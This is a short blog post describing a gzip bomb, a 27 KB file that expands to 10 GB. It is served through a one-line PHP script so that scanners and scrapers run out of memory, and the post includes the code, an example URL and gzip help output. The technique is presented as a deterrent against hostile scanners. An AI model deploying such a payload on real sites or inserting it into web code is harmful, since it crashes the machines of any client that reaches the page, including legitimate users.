10 GB in a 27 KB Gzip File [My Present To HTTP Scanners]

Here’s a gzip bomb I use to redirect http scanners and web scrapers to:

10G.gz

Create a PHP file with the following:

< ?php header('Content-Encoding: gzip'); echo file_get_contents('10G.gz');

Example: http://rehmann.co/gz-bomb.php

How it works:

  1. A web-crawler or browser requests the page and sends the "accept-encoding: gzip, deflate, br" header.
    So long as gzip is accepted, the gzip bomb will do its job.
  2. The web server and php script respond to the request with the 27 KB Gzip bomb package. 27 KB is delivered to the client.
  3. The client browser or crawler begins to unzip the data before it is processed by the script or shown to the user
  4. The client machine runs out of memory / crashes before the bomb is fully unzipped.

gzip flags

gzip -help
Apple gzip 264.50.1
usage: gzip [-123456789acdfhklLNnqrtVv] [-S .suffix] [ [ ...]]
-1 --fast fastest (worst) compression
-2 .. -8 set compression level
-9 --best best (slowest) compression
-c --stdout write to stdout, keep original files
--to-stdout
-d --decompress uncompress files
--uncompress
-f --force force overwriting & compress links
-h --help display this help
-k --keep don't delete input files during operation
-l --list list compressed file contents
-N --name save or restore original file name and time stamp
-n --no-name don't save original file name or time stamp
-q --quiet output no warnings
-r --recursive recursively compress files in directories
-S .suf use suffix .suf instead of .gz
--suffix .suf
-t --test test compressed file
-V --version display program version
-v --verbose print extra statistics